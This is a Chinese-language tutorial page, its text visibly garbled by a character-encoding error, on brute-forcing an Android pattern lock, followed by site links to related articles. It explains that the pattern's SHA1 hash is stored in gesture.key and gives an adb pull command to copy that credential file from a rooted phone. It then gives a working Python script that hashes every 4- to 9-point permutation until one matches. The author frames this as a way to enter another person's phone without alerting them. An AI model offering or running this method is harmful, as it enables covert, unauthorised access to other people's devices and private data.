基于Python的Android圖形解鎖程序詳解
安卓手機(jī)的圖形鎖是3x3的點(diǎn)陣,按次序連接數(shù)個(gè)點(diǎn)從而達(dá)到鎖定/解鎖的功能。最少需要連接4個(gè)點(diǎn),最多能連接9個(gè)點(diǎn)。網(wǎng)上也有暴力刪除手機(jī)圖形鎖的方法,即直接干掉圖形鎖功能。但假如你想進(jìn)入別人的手機(jī),但又不想引起其警覺(jué)的話……你可以參考一下本文(前提條件:手機(jī)需要root,而且打開(kāi)調(diào)試模式。一般來(lái)講,如果用過(guò)諸如“豌豆莢手機(jī)助手”、“360手機(jī)助手”一類的軟件,都會(huì)被要求打開(kāi)調(diào)試模式的。如果要?jiǎng)h除手機(jī)內(nèi)置軟件,則需要將手機(jī)root)。
首先科普一下,安卓手機(jī)是如何標(biāo)記這9個(gè)點(diǎn)的。通過(guò)閱讀安卓系統(tǒng)源碼可知,每個(gè)點(diǎn)都有其編號(hào),組成了一個(gè)3x3的矩陣,形如:
00 01 02
03 04 05
06 07 08
假如設(shè)定解鎖圖形為一個(gè)“L”形,如圖:
那么這幾個(gè)點(diǎn)的排列順序是這樣的:00 03 06 07 08。 系統(tǒng)就記下來(lái)了這一串?dāng)?shù)字,然后將這一串?dāng)?shù)字(以十六進(jìn)制的方式)進(jìn)行SHA1加密,存儲(chǔ)在了手機(jī)里的/data/system /gesture.key 文件中。我們用數(shù)據(jù)線連接手機(jī)和電腦,然后ADB連接手機(jī),將文件下載到電腦上(命令:adb pull /data/system/gesture.key gesture.key),如圖:
用WinHex等十六進(jìn)制編輯程序打開(kāi)gesture.key,會(huì)發(fā)現(xiàn)文件內(nèi)是SHA1加密過(guò)的字符串:c8c0b24a15dc8bbfd411427973574695230458f0,如圖:
當(dāng)你下次解鎖的時(shí)候,系統(tǒng)就對(duì)比你畫(huà)的圖案,看對(duì)應(yīng)的數(shù)字串是不是0003060708對(duì)應(yīng)的加密結(jié)果。如果是,就解鎖;不是就繼續(xù)保持鎖定。那么,如果窮舉所有的數(shù)字串排列,會(huì)有多少呢?聯(lián)想到高中的階乘,如果用4個(gè)點(diǎn)做解鎖圖形的話,就是9x8x7x6=3024種可能性,那5個(gè)點(diǎn)就是15120,6個(gè)點(diǎn)的話60480,7個(gè)點(diǎn)181440,8個(gè)點(diǎn)362880,9個(gè)點(diǎn)362880??偣彩?85824種可能性(但這么計(jì)算并不嚴(yán)密,因?yàn)橥粭l直線上的點(diǎn)只能和他們相鄰的點(diǎn)相連)。滿打滿算,也不到985824種可能性。乍一看很大,但在計(jì)算機(jī)面前,窮舉出來(lái)這些東西用不了幾秒鐘。
知道了原理,就著手寫(xiě)程序來(lái)實(shí)現(xiàn)吧。這里使用了Python來(lái)完成任務(wù)。主要應(yīng)用了hashlib模塊(對(duì)字符串進(jìn)行SHA1加密)和itertools模塊(Python內(nèi)置,生成00-09的排列組合)。主要流程為:
1.ADB連接手機(jī),獲取gesture.key文件
2.讀取key文件,存入字符串str_A
3.生成全部可能的數(shù)字串
4.對(duì)這些數(shù)字串進(jìn)行加密,得到字符串str_B
5.將字符串str_A與str_B進(jìn)行對(duì)比
6.如果字符串A,B相同,則說(shuō)明數(shù)字串num就是想要的解鎖順序
7.打印出數(shù)字串num
代碼如下:
# -*- coding: cp936 -*- import itertools import hashlib import time import os #調(diào)用cmd,ADB連接到手機(jī),讀取SHA1加密后的字符串 os.system("adb pull /data/system/gesture.key gesture.key") time.sleep(5) f=open('gesture.key','r') pswd=f.readline() f.close() pswd_hex=pswd.encode('hex') print '加密后的密碼為:%s'%pswd_hex #生成解鎖序列,得到['00','01','02','03','04','05','06','07','08'] matrix=[] for i in range(0,9): str_temp = '0'+str(i) matrix.append(str_temp) #將00——08的字符進(jìn)行排列,至少取4個(gè)數(shù)排列,最多全部進(jìn)行排列 min_num=4 max_num=len(matrix) for num in range(min_num,max_num+1):#從04 -> 08 iter1 = itertools.permutations(matrix,num)#從9個(gè)數(shù)字中挑出n個(gè)進(jìn)行排列 list_m=[] list_m.append(list(iter1))#將生成的排列全部存放到 list_m 列表中 for el in list_m[0]:#遍歷這n個(gè)數(shù)字的全部排列 strlist=''.join(el)#將list轉(zhuǎn)換成str。[00,03,06,07,08]-->0003060708 strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#將字符串進(jìn)行SHA1加密 if pswd_hex==strlist_sha1:#將手機(jī)文件里的字符串與加密字符串進(jìn)行對(duì)比 print '解鎖密碼為:',strlist
按說(shuō)得到解鎖密碼后,應(yīng)該break跳出循環(huán)的。但Python沒(méi)有跳出多重循環(huán)的語(yǔ)句,本想設(shè)置標(biāo)志位然后不停進(jìn)行判定,為了運(yùn)行速度就免去了這個(gè)步驟(有沒(méi)有更好的實(shí)現(xiàn)跳出多重循環(huán)的方法?)。另外也略去了很多容錯(cuò)語(yǔ)句。
總結(jié)
以上就是本文關(guān)于基于Python的Android圖形解鎖程序詳解的全部?jī)?nèi)容,希望對(duì)大家有所幫助。感興趣的朋友可以繼續(xù)參閱本站其他相關(guān)專題,如有不足之處,歡迎留言指出。感謝朋友們對(duì)本站的支持!
- 通過(guò)Python 獲取Android設(shè)備信息的輕量級(jí)框架
- python獲取android設(shè)備的GPS信息腳本分享
- Python實(shí)現(xiàn)刪除Android工程中的冗余字符串
- Python實(shí)現(xiàn)過(guò)濾單個(gè)Android程序日志腳本分享
- python服務(wù)器與android客戶端socket通信實(shí)例
- 使用python編寫(xiě)批量卸載手機(jī)中安裝的android應(yīng)用腳本
- 使用python編寫(xiě)android截屏腳本雙擊運(yùn)行即可
- python讀取Android permission文件
- 用Python腳本生成Android SALT擾碼的方法
- python搭建服務(wù)器實(shí)現(xiàn)兩個(gè)Android客戶端間收發(fā)消息
相關(guān)文章
Android Studio Gradle 更換阿里云鏡像的方法
這篇文章主要介紹了Android Studio Gradle 更換阿里云鏡像的方法,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2020-09-09簡(jiǎn)單實(shí)現(xiàn)Android倒計(jì)時(shí)效果
這篇文章主要教大家如何簡(jiǎn)單的實(shí)現(xiàn)Android倒計(jì)時(shí)效果,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2017-10-10Android編程之監(jiān)聽(tīng)器的實(shí)現(xiàn)方法
這篇文章主要介紹了Android編程之監(jiān)聽(tīng)器的實(shí)現(xiàn)方法,以實(shí)例形式較為詳細(xì)的分析了Android監(jiān)聽(tīng)器的創(chuàng)建、注冊(cè)及相關(guān)使用技巧,需要的朋友可以參考下2015-11-11Android BadTokenException異常解決案例詳解
這篇文章主要介紹了Android BadTokenException異常詳解,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧2021-08-08kotlin使用Dagger2的過(guò)程全紀(jì)錄
Dagger2是一款基于Java注解,在編譯階段完成依賴注入的開(kāi)源庫(kù),主要用于模塊間解耦,方便進(jìn)行測(cè)試。下面這篇文章主要給大家介紹了關(guān)于kotlin使用Dagger2的過(guò)程的相關(guān)資料,需要的朋友可以參考借鑒,下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧。2018-03-03OpenHarmony實(shí)現(xiàn)屏幕亮度動(dòng)態(tài)調(diào)節(jié)方法詳解
大家在拿到dayu之后,都吐槽說(shuō),會(huì)經(jīng)常熄屏,不利于調(diào)試,那么有沒(méi)有一種辦法,可以讓app不熄屏呢,答案是有的,今天我們就來(lái)揭秘一下,如何控制屏幕亮度2022-11-11Android新特性ConstraintLayout完全解析
這篇文章主要為大家詳細(xì)介紹了Android新特性ConstraintLayout ,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2017-10-10Android權(quán)限詢問(wèn)的實(shí)例詳解
這篇文章主要介紹了Android權(quán)限詢問(wèn),本文通過(guò)實(shí)例代碼給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2022-09-09android shape實(shí)現(xiàn)陰影或模糊邊效果
這篇文章主要介紹了android shape實(shí)現(xiàn)陰影或模糊邊效果,本文通過(guò)實(shí)例代碼給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2019-10-10